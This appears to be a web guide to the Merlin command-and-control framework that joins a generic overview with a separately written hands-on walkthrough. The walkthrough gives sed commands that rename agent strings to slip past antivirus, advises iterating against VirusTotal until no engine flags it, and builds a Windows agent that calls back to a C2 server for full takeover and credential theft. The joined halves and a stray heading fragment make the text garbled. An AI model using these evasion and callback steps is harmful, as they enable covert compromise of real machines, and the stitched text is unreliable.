In the ever-evolving landscape of cybersecurity, staying ahead of potential threats is paramount. Ethical hackers and security professionals utilize advanced tools to identify vulnerabilities before malicious actors exploit them. One such tool gaining prominence is the Merlin Command and Control (C2) platform. This comprehensive guide delves into the features, applications, and ethical use of Merlin C2 to enhance your cybersecurity arsenal.
Introduction to Merlin C2
Merlin C2 is an open-source, cross-platform post-exploitation command and control server and agent written in Go. Designed for red team operations and penetration testing, it allows security professionals to simulate advanced persistent threats (APTs) and test the resilience of networks and systems.
Why Merlin C2?
- Cross-Platform Compatibility: Works seamlessly across Windows, Linux, and macOS.
- Stealth Operations: Utilizes HTTP/2 over TLS, enhancing security and evasion capabilities.
- Modular Architecture: Supports extensions and custom modules for tailored operations.
Ethical and Legal Considerations
Before utilizing Merlin C2, it’s crucial to understand the ethical and legal responsibilities involved:
- Authorized Use Only: Ensure you have explicit permission to test the target systems.
- Compliance with Laws: Adhere to all applicable laws and regulations in your jurisdiction.
- Data Protection: Handle any collected data responsibly, maintaining confidentiality and integrity.
Disclaimer: This guide is intended for educational purposes and authorized security testing. Misuse of Merlin C2 can lead to severe legal consequences.
Key Features of Merlin C2
- Encrypted Communications: Secures data transmission between the server and agents.
- HTTP/2 Protocol: Enhances performance and evasion by mimicking legitimate web traffic.
- Dynamic Agents: Deploys agents that can operate in various environments and adapt to different scenarios.
- Extensibility: Offers the ability to develop custom modules and scripts.
Setting Up Merlin C2
Setting up Merlin C2 involves several steps to ensure a secure and functional environment. Below is an overview:
Prerequisites
- Go Programming Language: Required for building Merlin from source.
- Operating System: Compatible with Windows, Linux, or macOS.
- Administrative Privileges: Necessary for certain operations and configurations.
Installation Steps
- Download Merlin C2Obtain the latest version from the official GitHub repository.
- Build from Source
Navigate to the cloned directory and build the project:go build -o merlinserver ./cmd/merlinserver - Configure TLS Certificates
Generate or obtain valid TLS certificates to secure communications. - Run the Merlin Server
Launch the server with appropriate parameters:./merlinserver -c ./config/merlinserver.yaml - Deploy AgentsGenerate agent payloads suitable for the target operating systems.
Best Practices for Using Merlin C2
- Secure the Server: Implement firewall rules and access controls to restrict unauthorized access.
- Regular Updates: Keep the tool and dependencies updated to the latest versions.
- Use Non-Production Environments: Conduct testing in isolated environments to prevent unintended disruptions.
- Document Activities: Maintain logs of all actions performed for accountability and reporting.
Troubleshooting Common Issues
Agent Connection Failures
- Check Network Connectivity: Ensure there are no network blocks preventing agent-server communication.
- Verify TLS Certificates: Incorrect certificates can hinder secure connections.
Server Crashes
- Inspect Logs: Review server logs for error messages.
- Resource Limitations: Ensure the server has sufficient resources (CPU, memory).
Command Execution Errors
- Compatibility Issues: Verify that commands are compatible with the target agent’s operating system.
- Permissions: Ensure the agent has the necessary permissions to execute commands.
Conclusion
Merlin C2 is a powerful tool for ethical hackers and security professionals, offering advanced capabilities for penetration testing and red team operations. By understanding its features and adhering to ethical guidelines, you can effectively utilize Merlin C2 to enhance your organization’s cybersecurity posture.
Remember: With great power comes great responsibility. Always use such tools legally and ethically to contribute to a safer digital world.
Merlin in action!
To get started with Merlin, first install the Golang environment. This will allow you to customize the executable agent and add post-exploitation modules—which is, of course, heavily encouraged. Install Golang and Merlin with the following:
root@mmkernel:~/# add-apt-repository ppa:longsleep/golang-backports
root@mmkernel:~/# apt update && sudo apt install golang-go
root@mmkernel:~/# go version
go version go1.13 linux/amd64
root@mmkernel:~/# git clone https://github.com/Ne0nd0g/merlin && cd merlin
The real novelty of Merlin is that it relies on HTTP/2 to communicate with its backend server. HTTP/2, as opposed to HTTP/1.x, is a binary protocol that supports many performance-enhancing features, like stream multiplexing, server push, and so forth (a great free resource that discusses HTTP/2 in depth can be found at https://daniel.haxx.se/http2/http2-v1.12.pdf ). Even if a security device does catch and decrypt the C2 traffic, it might fail to parse the compressed HTTP/2 traffic and just forward it untouched.
If we compile a standard agent out of the box, it will be immediately busted by any regular antivirus agent doing simple string lookups for general conspicuous terms, so we need to make some adjustments. We’ll rename suspicious functions like ExecuteShell and remove references to the original package name, github.com/Ne0nd0g/merlin. We’ll use a classic find command to hunt for source code files containing these strings and pipe them into xargs, which will call sed to replace these suspicious terms with arbitrary words:
root@mmkernel:~/# find . -name '*.go' -type f -print0 \
| xargs -0 sed -i 's/ExecuteShell/MiniMice/g'
root@mmkernel:~/# find . -name '*.go' -type f -print0 \
| xargs -0 sed -i 's/executeShell/miniMice/g'
root@mmkernel:~/# find . -name '*.go' -type f -print0 \
| xargs -0 sed -i 's/\/Ne0nd0g\/merlin/\/mini\/heyho/g'
root@mmkernel:~/# sed -i 's/\/Ne0nd0g\/merlin/\/mini\/heyho/g' go.modThis crude string replacement bypasses 90 percent of antivirus solutions, including Windows Defender. Keep tweaking it and then testing it against a tool like VirusTotal (https://www.virustotal.com/gui/) until you pass all tests.
Now let’s compile an agent in the output folder that we will later drop on a Windows test machine:
root@mmkernel:~/# make agent-windows DIR="./output"
root@mmkernel:~/# ls output/
merlinAgent-Windows-x64.exeOnce executed on a machine, merlinAgent-Windows-x64.exe should connect back to our Merlin server and allow complete takeover of the target.
We fire up the Merlin C2 server using the go run command and instruct it to listen on all network interfaces with the -i 0.0.0.0 option:
root@mmkernel:~/# go run cmd/merlinserver/main.go -i 0.0.0.0 -p 8443 -psk\
strongPassphraseWhateverYouWant
[-] Starting h2 listener on 0.0.0.0:8443
Merlin>>
We execute the Merlin agent on a Windows virtual machine acting as the target
to trigger the payload:
PS C:\> .\merlinAgent-Windows-x64.exe -url https://192.168.1.29:8443 -psk\
strongPassphraseWhateverYouWantAnd here is what you should see on your attack server:
[+] New authenticated agent 6c2ba6-daef-4a34-aa3d-be944f1
Merlin>> interact 6c2ba6-daef-4a34-aa3d-be944f1
Merlin[agent][6c2ba6-daef-...]>> ls
[+] Results for job swktfmEFWu at 2020-09-22T18:17:39Z
Directory listing for: C:\
-rw-rw-rw- 2020-09-22 19:44:21 16432 Apps
-rw-rw-rw- 2020-09-22 19:44:15 986428 Drivers
--snip--The agent works like a charm. Now we can dump credentials on the target machine, hunt for files, move to other machines, launch a keylogger, and so forth.
Merlin is still a project in its infancy, so you will experience bugs and inconsistencies, most of them due to the instability of the HTTP/2 library in Golang. It’s not called “beta” for nothing, after all, but the effort behind this project is absolutely amazing. If you’ve ever wanted to get involved in Return of Command and Control 15 Golang, this could be your chance. The framework has just shy of 50 postexploitation modules, from credential harvesters to modules for compiling and executing C# in memory.
